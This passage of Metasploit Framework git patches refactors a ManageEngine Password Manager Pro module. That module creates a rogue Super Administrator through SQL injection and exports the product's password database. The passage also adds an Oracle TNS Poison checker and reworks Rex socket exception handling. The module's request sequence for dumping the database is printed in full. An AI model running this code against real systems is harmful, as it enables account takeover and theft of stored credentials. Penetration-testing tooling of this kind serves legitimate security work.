'method' => 'GET' - }) + 'uri' => normalize_uri("PassTrixMain.cc"), + 'method' => 'GET' + }) if res && res.code == 200 && res.body && res.body.to_s =~ /ManageEngine Password Manager Pro/ && ( From 635df2f233a33218092681f7174c8e1130e75e36 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 09:50:26 -0600 Subject: [PATCH 14/38] Fail with NoAccess --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 4cceb67f2b..19a5d86e21 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -223,7 +223,7 @@ class Metasploit3 < Msf::Auxiliary version = get_version @cookie = login(datastore['USERNAME'], datastore['PASSWORD']) if @cookie == nil - fail_with(Failure::Unknown, "#{peer} - Failed to authenticate.") + fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate.") end creds = inject_sql(version < 7000 ? true : false) From 8f17011909009e52b2ba45a32b902baaaed75400 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 11:11:49 -0600 Subject: [PATCH 15/38] do run clean up * Reduce code complexity * Don't report not valid administrator credentials --- .../admin/http/manageengine_pmp_privesc.rb | 101 +++++++++--------- 1 file changed, 53 insertions(+), 48 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 19a5d86e21..ee0a87ad62 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -220,6 +220,10 @@ class Metasploit3 < Msf::Auxiliary def run + unless check == Exploit::CheckCode::Appears + print_error("#{peer} - Fingerprint hasn't been successful, trying to exploit anyway...") + end + version = get_version @cookie = login(datastore['USERNAME'], datastore['PASSWORD']) if @cookie == nil @@ -232,57 +236,58 @@ class Metasploit3 < Msf::Auxiliary print_good("#{peer} - Created a new Super Administrator with username: #{username} | password: #{password}") cookie_su = login(username, password) - if cookie_su != nil - # 1st we turn on password exports - send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, 'ConfigureOffline.ve'), - 'cookie' => cookie_su, - 'vars_post' => { - 'IS_XLS' => 'true', - 'includePasswd' => 'true', - 'HOMETAB' => 'true', - 'RESTAB' => 'true', - 'RGTAB' => 'true', - 'PASSWD_RULE' => 'Offline Password File', - 'LOGOUT_TIME' => '20' - } - }) - - # now get the loot! - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, 'jsp', 'xmlhttp', 'AjaxResponse.jsp'), - 'cookie' => cookie_su, - 'vars_get' => { - 'RequestType' => 'ExportResources' - } - }) - if res && res.code == 200 && res.body && res.body.to_s.length > 0 - vprint_line(res.body.to_s) - print_good("#{peer} - Successfully exported password database from Password Manager Pro.") - loot_name = 'manageengine.passwordmanagerpro.password.db' - loot_type = 'text/csv' - loot_filename = 'manageengine_pmp_password_db.csv' - loot_desc = 'ManageEngine Password Manager Pro Password DB' - p = store_loot( - loot_name, - loot_type, - rhost, - res.body, - loot_filename, - loot_desc) - print_status "Password database saved in: #{p}" - else - print_error("#{peer} - Failed to export Password Manager Pro passwords.") - end - status = Metasploit::Model::Login::Status::SUCCESSFUL - else - print_error("#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") - status = Metasploit::Model::Login::Status::DENIED_ACCESS + if cookie_su.nil? + fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") end + # 1st we turn on password exports + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'ConfigureOffline.ve'), + 'cookie' => cookie_su, + 'vars_post' => { + 'IS_XLS' => 'true', + 'includePasswd' => 'true', + 'HOMETAB' => 'true', + 'RESTAB' => 'true', + 'RGTAB' => 'true', + 'PASSWD_RULE' => 'Offline Password File', + 'LOGOUT_TIME' => '20' + } + }) + + # now get the loot! + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'jsp', 'xmlhttp', 'AjaxResponse.jsp'), + 'cookie' => cookie_su, + 'vars_get' => { + 'RequestType' => 'ExportResources' + } + }) + + if res && res.code == 200 && res.body && res.body.to_s.length > 0 + vprint_line(res.body.to_s) + print_good("#{peer} - Successfully exported password database from Password Manager Pro.") + loot_name = 'manageengine.passwordmanagerpro.password.db' + loot_type = 'text/csv' + loot_filename = 'manageengine_pmp_password_db.csv' + loot_desc = 'ManageEngine Password Manager Pro Password DB' + p = store_loot( + loot_name, + loot_type, + rhost, + res.body, + loot_filename, + loot_desc) + print_status "Password database saved in: #{p}" + else + print_error("#{peer} - Failed to export Password Manager Pro passwords.") + end + status = Metasploit::Model::Login::Status::SUCCESSFUL + + service_data = { address: rhost, port: rport, From 92df11baa70d1f41d73734da42de500230f67512 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 11:16:25 -0600 Subject: [PATCH 16/38] Create report_super_admin_creds method --- .../admin/http/manageengine_pmp_privesc.rb | 35 +++++++++++-------- 1 file changed, 20 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index ee0a87ad62..dfd0b2f323 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -239,6 +239,8 @@ class Metasploit3 < Msf::Auxiliary if cookie_su.nil? fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") + else + report_super_admin_creds(username, password) end # 1st we turn on password exports @@ -285,31 +287,34 @@ class Metasploit3 < Msf::Auxiliary else print_error("#{peer} - Failed to export Password Manager Pro passwords.") end + end + + def report_super_admin_creds(username, password) status = Metasploit::Model::Login::Status::SUCCESSFUL - service_data = { - address: rhost, - port: rport, - service_name: 'https', - protocol: 'tcp', - workspace_id: myworkspace_id + address: rhost, + port: rport, + service_name: 'https', + protocol: 'tcp', + workspace_id: myworkspace_id } + credential_data = { - origin_type: :service, - module_fullname: self.fullname, - private_type: :password, - private_data: username, - username: password + origin_type: :service, + module_fullname: self.fullname, + private_type: :password, + private_data: username, + username: password } credential_data.merge!(service_data) credential_core = create_credential(credential_data) login_data = { - core: credential_core, - access_level: 'Super Administrator', - status: status, - last_attempted_at: DateTime.now + core: credential_core, + access_level: 'Super Administrator', + status: status, + last_attempted_at: DateTime.now } login_data.merge!(service_data) create_credential_login(login_data) From 7aed1e9581de560af0b0d7d794fb36f43f6be475 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 11:21:44 -0600 Subject: [PATCH 17/38] Create loot_passwords method --- .../admin/http/manageengine_pmp_privesc.rb | 96 ++++++++++--------- 1 file changed, 51 insertions(+), 45 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index dfd0b2f323..5273dfa348 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -239,54 +239,13 @@ class Metasploit3 < Msf::Auxiliary if cookie_su.nil? fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") - else - report_super_admin_creds(username, password) end - # 1st we turn on password exports - send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, 'ConfigureOffline.ve'), - 'cookie' => cookie_su, - 'vars_post' => { - 'IS_XLS' => 'true', - 'includePasswd' => 'true', - 'HOMETAB' => 'true', - 'RESTAB' => 'true', - 'RGTAB' => 'true', - 'PASSWD_RULE' => 'Offline Password File', - 'LOGOUT_TIME' => '20' - } - }) + print_stats("#{peer} - Reporting Super Administrator credentials...") + report_super_admin_creds(username, password) - # now get the loot! - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, 'jsp', 'xmlhttp', 'AjaxResponse.jsp'), - 'cookie' => cookie_su, - 'vars_get' => { - 'RequestType' => 'ExportResources' - } - }) - - if res && res.code == 200 && res.body && res.body.to_s.length > 0 - vprint_line(res.body.to_s) - print_good("#{peer} - Successfully exported password database from Password Manager Pro.") - loot_name = 'manageengine.passwordmanagerpro.password.db' - loot_type = 'text/csv' - loot_filename = 'manageengine_pmp_password_db.csv' - loot_desc = 'ManageEngine Password Manager Pro Password DB' - p = store_loot( - loot_name, - loot_type, - rhost, - res.body, - loot_filename, - loot_desc) - print_status "Password database saved in: #{p}" - else - print_error("#{peer} - Failed to export Password Manager Pro passwords.") - end + print_status("#{peer} - Leaking Password database...") + loot_passwords(cookie_su) end def report_super_admin_creds(username, password) @@ -319,4 +278,51 @@ class Metasploit3 < Msf::Auxiliary login_data.merge!(service_data) create_credential_login(login_data) end + + def loot_passwords(cookie_admin) + # 1st we turn on password exports + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'ConfigureOffline.ve'), + 'cookie' => cookie_admin, + 'vars_post' => { + 'IS_XLS' => 'true', + 'includePasswd' => 'true', + 'HOMETAB' => 'true', + 'RESTAB' => 'true', + 'RGTAB' => 'true', + 'PASSWD_RULE' => 'Offline Password File', + 'LOGOUT_TIME' => '20' + } + }) + + # now get the loot! + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'jsp', 'xmlhttp', 'AjaxResponse.jsp'), + 'cookie' => cookie_admin, + 'vars_get' => { + 'RequestType' => 'ExportResources' + } + }) + + if res && res.code == 200 && res.body && res.body.to_s.length > 0 + vprint_line(res.body.to_s) + print_good("#{peer} - Successfully exported password database from Password Manager Pro.") + loot_name = 'manageengine.passwordmanagerpro.password.db' + loot_type = 'text/csv' + loot_filename = 'manageengine_pmp_password_db.csv' + loot_desc = 'ManageEngine Password Manager Pro Password DB' + p = store_loot( + loot_name, + loot_type, + rhost, + res.body, + loot_filename, + loot_desc) + print_status("#{peer} - Password database saved in: #{p}") + else + print_error("#{peer} - Failed to export Password Manager Pro passwords.") + end + end end From 65dbb1a83f5025ccf469a51c3157e8a19213019f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 11:26:53 -0600 Subject: [PATCH 18/38] Do print_status --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 5273dfa348..1bbc7a5656 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -241,7 +241,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") end - print_stats("#{peer} - Reporting Super Administrator credentials...") + print_status("#{peer} - Reporting Super Administrator credentials...") report_super_admin_creds(username, password) print_status("#{peer} - Leaking Password database...") From 4b701700c1a80e7fd8afc101534ddc82d8c1a547 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 12:40:53 -0600 Subject: [PATCH 19/38] Fix banner --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 1bbc7a5656..8b4361b4eb 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -1,5 +1,5 @@ ## -# This module requires Metasploit: http//metasploit.com/download +# This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## From c0285067c9ecb0b7e7c8571d3c7a137d27784103 Mon Sep 17 00:00:00 2001 From: Nikita Date: Tue, 11 Nov 2014 17:29:27 +0300 Subject: [PATCH 20/38] Add new module to test TNS poison msf auxiliary(tnspoison_checker) > show options Module options (auxiliary/scanner/oracle/tnspoison_checker1): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 172.16.2.100, 172.16.2.24, 172.16.2.101 yes The target address range or CIDR identifier RPORT 1521 yes The target port THREADS 1 yes The number of concurrent threads msf auxiliary(tnspoison_checker) > exploit [+] 172.16.2.100:1521 is vulnerable [*] Scanned 1 of 3 hosts (033% complete) [-] 172.16.2.24:1521 is not vulnerable [*] Scanned 2 of 3 hosts (066% complete) [-] 172.16.2.101:1521 unable to connect to the server [*] Scanned 3 of 3 hosts (100% complete) [*] Auxiliary module execution completed --- .../scanner/oracle/tnspoison_checker.rb | 39 ++++++++----------- 1 file changed, 16 insertions(+), 23 deletions(-) diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index 8f22c55533..cbc48eb1f1 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -13,14 +13,17 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Oracle TNS Poison vulnerability', + 'Name' => 'Oracle TNS Listener Checker', 'Description' => %q{ - This module simply checks the server for vulnerabilities like TNS Poison. + This module checks the server for vulnerabilities like TNS Poison. + Module sends to server a packet with command to register new TNS Listener and check response. }, - 'Author' => ['ir0njaw (Kelesis Nikita)'], - 'Company' => ['Digital Security - http://dsec.ru'], - 'License' => MSF_LICENSE, - 'DisclosureDate' => 'Oct 12 2014')) + 'Author' => ['ir0njaw (Nikita Kelesis) '], # of Digital Security [http://dsec.ru] + 'References' => + [ + [ 'URL', 'http://seclists.org/fulldisclosure/2012/Apr/204' ], + ], + 'License' => MSF_LICENSE)) register_options( [ @@ -33,23 +36,13 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) begin connect - - pkt = tns_packet("(CONNECT_DATA=(COMMAND=service_register_NSGR))") - sock.put(pkt) - a= sock.read(100) - - flag = a.include? "(ERROR_STACK=(ERROR=" - if (flag==true) then print_error ip+" is not vulnerable" - else print_good ip+" is vulnerable" - end - - rescue ::Rex::ConnectionError, ::Errno::EPIPE - print_error("#{ip} unable to connect to the server") - - - rescue ::Rex::ConnectionError - rescue ::Errno::EPIPE - + send_packet = tns_packet("(CONNECT_DATA=(COMMAND=service_register_NSGR))") + sock.put(send_packet) + packet = sock.read(100) + find_packet = packet.include? "(ERROR_STACK=(ERROR=" + find_packet == true ? print_error("#{ip}:#{rport} is not vulnerable ") : print_good("#{ip}:#{rport} is vulnerable") + rescue ::Rex::ConnectionError, ::Errno::EPIPE + print_error("#{ip}:#{rport} unable to connect to the server") end end end From 6b4eb9a8e23452d26c6074bea61ecf03a6e44a20 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 11 Nov 2014 14:59:41 -0600 Subject: [PATCH 21/38] Differentiate failed binds from connects, closes #4169 This change adds two new Rex exceptions and changes the local comm to raise the right one depending on the circumstances. The problem with the existing model is that failed binds and failed connections both raised the same exception. This change is backwards compatible with modules that rescue Rex::AddressInUse in additi on to Rex::ConnectionError. There were two corner cases that rescued Rex::AddressInUse specifically: 1. The 'r'-services mixin and modules caught the old exception when handling bind errors. These have been updated to use BindFailed 2. The meterpreter client had a catch for the old exception when the socket reports a bad destination (usually a network connection dropped). This has been updat ed to use InvalidDestination as that was the intention prior to this change. Since AddressInUse was part of ConnectionError, modules and mixins which caught both in the same rescue have been updated to just catch ConnectionError. --- lib/metasploit/framework/login_scanner/ftp.rb | 2 +- .../framework/login_scanner/telnet.rb | 2 +- lib/msf/core/auxiliary/rservices.rb | 2 +- lib/msf/core/auxiliary/scanner.rb | 48 +++++++++++++++++-- lib/rex/exceptions.rb | 42 ++++++++++++++-- lib/rex/post/meterpreter/ui/console.rb | 2 +- lib/rex/socket/comm/local.rb | 4 +- modules/auxiliary/gather/xerox_pwd_extract.rb | 6 +-- .../scanner/rservices/rexec_login.rb | 2 +- .../auxiliary/scanner/rservices/rsh_login.rb | 2 +- .../scanner/ssh/cerberus_sftp_enumusers.rb | 4 +- .../auxiliary/scanner/ssh/ssh_enumusers.rb | 2 +- .../scanner/ssh/ssh_identify_pubkeys.rb | 2 +- .../apple_ios/ssh/cydia_default_ssh.rb | 2 +- .../linux/ssh/f5_bigip_known_privkey.rb | 2 +- ...oadbalancerorg_enterprise_known_privkey.rb | 2 +- .../linux/ssh/quantum_dxi_known_privkey.rb | 2 +- .../linux/ssh/quantum_vmpro_backdoor.rb | 2 +- .../exploits/linux/ssh/symantec_smg_ssh.rb | 2 +- modules/exploits/multi/ssh/sshexec.rb | 2 +- modules/exploits/unix/misc/xerox_mfp.rb | 2 +- .../ssh/array_vxag_vapv_privkey_privesc.rb | 2 +- .../unix/ssh/tectia_passwd_changereq.rb | 2 +- 23 files changed, 105 insertions(+), 35 deletions(-) diff --git a/lib/metasploit/framework/login_scanner/ftp.rb b/lib/metasploit/framework/login_scanner/ftp.rb index 98b2b2f835..6c8ad94028 100644 --- a/lib/metasploit/framework/login_scanner/ftp.rb +++ b/lib/metasploit/framework/login_scanner/ftp.rb @@ -41,7 +41,7 @@ module Metasploit begin success = connect_login(credential.public, credential.private) - rescue ::EOFError, Errno::ECONNRESET, Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error + rescue ::EOFError, Errno::ECONNRESET, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT success = false end diff --git a/lib/metasploit/framework/login_scanner/telnet.rb b/lib/metasploit/framework/login_scanner/telnet.rb index c227a82187..f104cdf708 100644 --- a/lib/metasploit/framework/login_scanner/telnet.rb +++ b/lib/metasploit/framework/login_scanner/telnet.rb @@ -92,7 +92,7 @@ module Metasploit end end - rescue ::EOFError, Errno::ECONNRESET, Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error + rescue ::EOFError, Errno::ECONNRESET, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT end diff --git a/lib/msf/core/auxiliary/rservices.rb b/lib/msf/core/auxiliary/rservices.rb index 9d7e09a768..3313786bed 100644 --- a/lib/msf/core/auxiliary/rservices.rb +++ b/lib/msf/core/auxiliary/rservices.rb @@ -35,7 +35,7 @@ module Auxiliary::RServices begin sd = connect(true, { 'CPORT' => cport }) - rescue Rex::AddressInUse + rescue Rex::BindFailed # Ignore and try again #vprint_error("Unable to connect: #{$!}") diff --git a/lib/msf/core/auxiliary/scanner.rb b/lib/msf/core/auxiliary/scanner.rb index 856b7bfddc..f2c50e9e39 100644 --- a/lib/msf/core/auxiliary/scanner.rb +++ b/lib/msf/core/auxiliary/scanner.rb @@ -57,6 +57,7 @@ def run threads_max = datastore['THREADS'].to_i @tl = [] + @scan_errors = [] # # Sanity check threading given different conditions @@ -87,17 +88,22 @@ def run begin if (self.respond_to?('run_range')) - # No automated progress reporting for run_range + # No automated progress reporting or error handling for run_range return run_range(datastore['RHOSTS']) end if (self.respond_to?('run_host')) - @tl = [] - loop do + # Stop scanning if we hit a fatal error + break if @scan_errors.length > 0 + # Spawn threads for each host while (@tl.length < threads_max) + + # Stop scanning if we hit a fatal error + break if @scan_errors.length > 0 + ip = ar.next_ip break if not ip @@ -108,6 +114,10 @@ def run begin nmod.run_host(targ) + rescue ::Rex::BindFailed + if datastore['CHOST'] + @scan_errors << "The source IP (CHOST) value of #{datastore['CHOST']} was not usable" + end rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error, ::EOFError rescue ::Interrupt,::NoMethodError, ::RuntimeError, ::ArgumentError, ::NameError raise $! @@ -120,6 +130,9 @@ def run end end + # Stop scanning if we hit a fatal error + break if @scan_errors.length > 0 + # Exit once we run out of hosts if(@tl.length == 0) break @@ -139,6 +152,7 @@ def run scanner_show_progress() if @show_progress end + scanner_report_fatal_errors return end @@ -153,10 +167,12 @@ def run ar = Rex::Socket::RangeWalker.new(datastore['RHOSTS']) - @tl = [] - while(true) nohosts = false + + # Stop scanning if we hit a fatal error + break if @scan_errors.length > 0 + while (@tl.length < threads_max) batch = [] @@ -178,6 +194,10 @@ def run mybatch = bat.dup begin nmod.run_batch(mybatch) + rescue ::Rex::BindFailed + if datastore['CHOST'] + @scan_errors << "The source IP (CHOST) value of #{datastore['CHOST']} was not usable" + end rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error rescue ::Interrupt,::NoMethodError, ::RuntimeError, ::ArgumentError, ::NameError raise $! @@ -197,6 +217,9 @@ def run end end + # Stop scanning if we hit a fatal error + break if @scan_errors.length > 0 + # Exit if there are no more pending threads if (@tl.length == 0) break @@ -218,6 +241,7 @@ def run scanner_show_progress() if @show_progress end + scanner_report_fatal_errors return end @@ -240,6 +264,20 @@ def seppuko! end end +def scanner_report_fatal_errors + return unless @scan_errors && @scan_errors.length > 0 + return unless @tl + + # First kill any running threads + @tl.each {|t| t.kill if t.alive? } + + # Show the unique errors triggered by the scan + @scan_errors.uniq.each do |emsg| + print_error("Fatal: #{emsg}") + end + print_status("Scan terminated due to one or more fatal errors") +end + def scanner_progress return 0 unless @range_done and @range_count pct = (@range_done / @range_count.to_f) * 100 diff --git a/lib/rex/exceptions.rb b/lib/rex/exceptions.rb index 15edd0ae61..73b085f5ee 100644 --- a/lib/rex/exceptions.rb +++ b/lib/rex/exceptions.rb @@ -213,25 +213,57 @@ class ConnectionTimeout < ConnectionError end end +### +# +# This connection error is raised when an attempt is made to connect +# to a broadcast or network address. +# +### +class InvalidDestination < ConnectionError + include SocketError + include HostCommunicationError + + def to_s + "The destination is invalid: #{addr_to_s}." + end +end ### # # This exception is raised when an attempt to use an address or port that is -# already in use occurs, such as binding to a host on a given port that is -# already in use. Note that Windows raises this in some cases when attempting -# to connect to addresses that it can't handle, e.g. "0.0.0.0". Thus, this is -# a ConnectionError. +# already in use or onot available occurs. such as binding to a host on a +# given port that is already in use, or when a bind address is specified that +# is not available to the host. # ### +class BindFailed < ::ArgumentError + include SocketError + include HostCommunicationError + + def to_s + "The address is already in use or unavailable: #{addr_to_s}." + end +end + +## +# +# This exception is listed for backwards compatibility. We had been +# using AddressInUse as the exception for both bind errors and connection +# errors triggered by connection attempts to broadcast and network addresses. +# The two classes above have split this into their respective sources, but +# callers may still expect the old behavior. +# +## class AddressInUse < ConnectionError include SocketError include HostCommunicationError def to_s - "The address is already in use #{addr_to_s}." + "The address is already in use or unavailable: #{addr_to_s}." end end + ### # # This exception is raised when an unsupported internet protocol is specified. diff --git a/lib/rex/post/meterpreter/ui/console.rb b/lib/rex/post/meterpreter/ui/console.rb index 550c37175e..3b2519d324 100644 --- a/lib/rex/post/meterpreter/ui/console.rb +++ b/lib/rex/post/meterpreter/ui/console.rb @@ -106,7 +106,7 @@ class Console log_error("Operation timed out.") rescue RequestError => info log_error(info.to_s) - rescue Rex::AddressInUse => e + rescue Rex::InvalidDestination => e log_error(e.message) rescue ::Errno::EPIPE, ::OpenSSL::SSL::SSLError, ::IOError self.client.kill diff --git a/lib/rex/socket/comm/local.rb b/lib/rex/socket/comm/local.rb index 98908c96eb..82c843a6c3 100644 --- a/lib/rex/socket/comm/local.rb +++ b/lib/rex/socket/comm/local.rb @@ -195,7 +195,7 @@ class Rex::Socket::Comm::Local rescue ::Errno::EADDRNOTAVAIL,::Errno::EADDRINUSE sock.close - raise Rex::AddressInUse.new(param.localhost, param.localport), caller + raise Rex::BindFailed.new(param.localhost, param.localport), caller end end @@ -295,7 +295,7 @@ class Rex::Socket::Comm::Local rescue ::Errno::EADDRNOTAVAIL,::Errno::EADDRINUSE sock.close - raise Rex::AddressInUse.new(ip, port), caller + raise Rex::InvalidDestination.new(ip, port), caller rescue Errno::ETIMEDOUT sock.close diff --git a/modules/auxiliary/gather/xerox_pwd_extract.rb b/modules/auxiliary/gather/xerox_pwd_extract.rb index 92a33b2cbc..7ba3ac620c 100644 --- a/modules/auxiliary/gather/xerox_pwd_extract.rb +++ b/modules/auxiliary/gather/xerox_pwd_extract.rb @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary begin connect(true, 'RPORT' => jport) sock.put(create_print_job) - rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse + rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout print_error("#{rhost}:#{jport} - Error connecting to #{rhost}") ensure disconnect @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary res = sock.get_once || '' passwd = res.match(/\r\n\s(.+?)\n/) return passwd ? passwd[1] : '' - rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse, EOFError + rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, ::EOFError print_error("#{rhost}:#{jport} - Error getting password from #{rhost}") return ensure @@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary begin connect(true, 'RPORT' => jport) sock.put(remove_print_job) - rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse + rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout print_error("#{rhost}:#{jport} - Error removing print job from #{rhost}") ensure disconnect diff --git a/modules/auxiliary/scanner/rservices/rexec_login.rb b/modules/auxiliary/scanner/rservices/rexec_login.rb index 46846c8189..62cd727715 100644 --- a/modules/auxiliary/scanner/rservices/rexec_login.rb +++ b/modules/auxiliary/scanner/rservices/rexec_login.rb @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary begin sd = Rex::Socket.create_tcp_server('LocalPort' => stderr_port) - rescue Rex::AddressInUse + rescue Rex::BindFailed # Ignore and try again end diff --git a/modules/auxiliary/scanner/rservices/rsh_login.rb b/modules/auxiliary/scanner/rservices/rsh_login.rb index ba01be2362..7bb64ca213 100644 --- a/modules/auxiliary/scanner/rservices/rsh_login.rb +++ b/modules/auxiliary/scanner/rservices/rsh_login.rb @@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary begin sd = Rex::Socket.create_tcp_server('LocalPort' => lport) - rescue Rex::AddressInUse + rescue Rex::BindFailed # Ignore and try again end diff --git a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb index 708447987d..24e141f588 100644 --- a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary begin transport = Net::SSH::Transport::Session.new(ip, options) - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return :connection_error end @@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary :fail end end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return :connection_error rescue Net::SSH::Disconnect, ::EOFError return :success diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index bf77ecc502..b4df478b0a 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary ::Timeout.timeout(datastore['SSH_TIMEOUT']) do Net::SSH.start(ip, user, opt_hash) end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return :connection_error rescue Net::SSH::Disconnect, ::EOFError return :success diff --git a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb index 8f35117c9b..6a35873c0c 100644 --- a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb +++ b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb @@ -226,7 +226,7 @@ class Metasploit3 < Msf::Auxiliary ::Timeout.timeout(1) { ssh_socket.close if ssh_socket } rescue nil - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return :connection_error rescue Net::SSH::Disconnect, ::EOFError return :connection_disconnect diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index e5a1a27e31..1cb15a9101 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(rhost, user, opts) end - 